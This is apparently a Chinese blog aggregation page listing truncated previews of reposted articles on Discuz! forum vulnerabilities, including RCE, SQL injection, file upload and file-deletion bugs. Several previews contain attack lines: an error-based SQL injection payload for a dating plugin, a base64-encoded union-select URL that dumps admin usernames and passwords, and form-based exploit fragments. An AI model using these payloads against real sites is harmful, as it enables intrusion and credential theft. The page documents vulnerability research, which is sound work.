Discuz! ML RCE漏洞 getshell 复现Discuz! ML RCE漏洞 getshell 复现0x00 影响版本Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区,漏洞版本如下:Discuz! ML V3.2Discuz! ML V3.3Discuz! ML V3.40x01 环境搭建使用ph
转载 2021-05-04 23:42:03
842阅读
2评论
topicadmin.php文件中的下面代码中,一看就是$accessadd1、$accessadd2这两个变量没有初始化。有可能引发SQL注射攻击。但实际我也没有时间和精力去测试。毕竟如果可以利用的话,要有一定权限哦。有兴趣的朋友可以自己看看。 if($adminid == 3) {if($accessmasks) {$accessadd1 = ', a.allowview, a.allowp
转载 精选 2007-05-14 17:01:47
1258阅读
1评论
来源:坏狼安全网// 允许程序在 register_globals = off 的环境下工作$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extra
原创 2007-11-26 18:21:20
10000+阅读
3评论
DZ交友插件漏洞jiaoyou.php?pid=1有的注入需要登录,注入代码如下:' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e))&nbsp
转载 精选 2014-11-03 19:37:08
798阅读
Discuz! $_DCACHE数组变量覆盖漏洞author: ryat_at_[url]www.wolvez.org[/url]team:[url]http://www.80vul.com[/url]由于Discuz! 的wap\index.php调用Chinese类里Convert方法在处理post数据时不当忽视对数组的处理,可使数组被覆盖为NULL.当覆盖$_DCACHE时导致导致xss s
转载 精选 2008-11-16 20:35:26
2432阅读
Discuz! X2 SQL注射漏洞,支持Union 文件:source\module\forum\forum_p_w_upload.php 详细: 1 2 3 4 5 6 7 8 9 if(!d
转载 2011-07-04 19:40:40
2667阅读
早上看到这个漏洞的exp,和netkey牛讨论了下,ring牛利用 Discuz.net 域名服务商的漏洞,劫持了Custom.discuz.net这个域名,将这个域名解析到自己构造的一个假站点上。而在这个假站点上存放了exp攻击代 码,主要文件为news.php。这里说明一下,discuz后台有一个通知功能用来通知站长修补漏洞等,该方式应该是在论坛后台script包含了[url]http:
转载 精选 2009-01-09 14:34:19
1587阅读
1评论
转自oldjun's blog首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xhming给了个poc,我给了个exp,确实发现的是同一个问题。截止夜里2点多种我下线,还只有t00ls核心群里几个人知道我给出的exp,可我怎么也想不到,经过半天时间,exp就满天飞了,而且确实出自昨天我的那个版
转载 精选 2012-07-05 12:01:53
699阅读
Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求报文可以直
原创 2023-01-06 16:44:26
477阅读
第一种方法:先注册个用户然后把<form method="post" action="   http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">帖子ID,指定一个存在的帖子即可:<input type="text&qu
转载 精选 2012-07-10 08:29:09
912阅读
1点赞
首先感谢尖刀的兄弟分享此漏洞,感谢好基友@园长MM。漏洞原文链接http://p2j.cn/?p=357,看到只有利用没有漏洞分析,这里简单说一下漏洞触发的流程,大牛勿喷。0x01 漏洞分析漏洞的根源在代码注释中出现换行,导致代码执行,流程如下:0x0101 首先,从 index.php第30行跟入。0x0102 do_config_inc.php的第37行,跟入这个save_config_fil
转载 精选 2015-01-19 16:50:23
1369阅读
第一种方法: 先注册个用户然后把 <form method="post" action="   http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data"> 帖子ID,指定一个存在的帖子即可:<input type="t
原创 2010-01-08 16:28:00
930阅读
Discuz NT多个版本文件上传漏洞 文章作者:rebeyond 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。 受影响版本:貌似都受影响。 漏洞文件:tools/ajax.aspx   漏洞分析
转载 精选 2012-05-08 08:21:16
3203阅读
1评论
  DZ2.0直接暴管理账号密码(默认前缀的情况下) /forum.php?mod=p_w_upload&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd 29yZCkgZnJvbSBwcm
转载 精选 2011-06-29 21:08:18
6564阅读
漏洞的发现来自于对某站的渗透,由于其discuz版本为7.0,所以我只能把眼光聚焦在了它所安装的第三方插件上。 经过简单的测试,就发现了《虚拟股市》存在注射漏洞:  http://www.target.com/plugin.php ... _One&stockid=91 # 91为可变参数  http://www.target.com/plugin.php .
转载 精选 2012-07-09 16:31:29
677阅读
1点赞
1评论
漏洞背景:Discuz!X社区软件,是一个采用PHP和MySQL等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。2017年9月29日,知道创宇404实验室开始应急,经过知道创宇404实验室分析确认,该漏洞于2014年6月被提交到Wooyun漏洞平台,Seebug漏
原创 2019-07-18 14:34:31
1194阅读
漏洞影响了Discuz3.4以下的所有版本。该漏洞存在于upload/source/include/spacecp/spacecp_profile.php,文件中的submitcheck()函数。成功上传文件会跳转执行unlink这个函数。1.进入设置-个人资料,先在页面源代码找到formhash值,可以看到值为2599b5e52.开启一个插件HackbarPost数据:birthprovince
原创 2020-02-24 11:53:07
827阅读
之前乌云上被提交的漏洞,今天突然被人发出来了,然后就各种中枪。奈何各种考试马上就来了,我也没工夫去写exp或脚本什么的,趁点休息时间把代码看看就好。实话说我很讨厌这种情况,一大堆人会的不会的拿着别人发的exp刷漏洞,刷分刷钱。不如静下心来分析一下漏洞产生的原因,也算是我吃不到葡萄在说葡萄酸吧,笑。    因为有同学给出POC了,POC如下: &nb
转载 精选 2014-11-21 14:14:02
854阅读
网站渗透测试服务之discuz漏洞挖掘与利用分类专栏:网站安全网站被黑网站被篡改如何防止网站被侵入网站安全服务如何防止网站被挂马如何防止网站被黑网站安全问题ecshop漏洞修复网站安全检测ecshop网站安全修补wordpress漏洞修复MetInfo漏洞修复网站被黑怎么修复dz论坛Discuz_X3.4最新网站漏洞网站安全防护服务文章标签:网站安全渗透测试服务版权近期我们SINE安全在对disc
原创 2020-12-01 16:44:29
2329阅读
dz论坛Discuz_X3.4最新网站漏洞分类专栏:网站安全网站被篡改dz论坛Discuz_X3.4最新网站漏洞网站安全版权近期我们sinesafe安全部门审计discuz最新版的时候发现配置文件写入导致代码执行的问题。cms安装的时候一般会分为几个步骤去进行,其中有对配置文件config进行写入的步骤,当写入的时候未严格限制传入的参数就存在代码执行问题。源码信息:Discuz_X3.4_GIT_
原创 2020-12-02 10:14:02
6540阅读
  • 1
  • 2
  • 3
  • 4
  • 5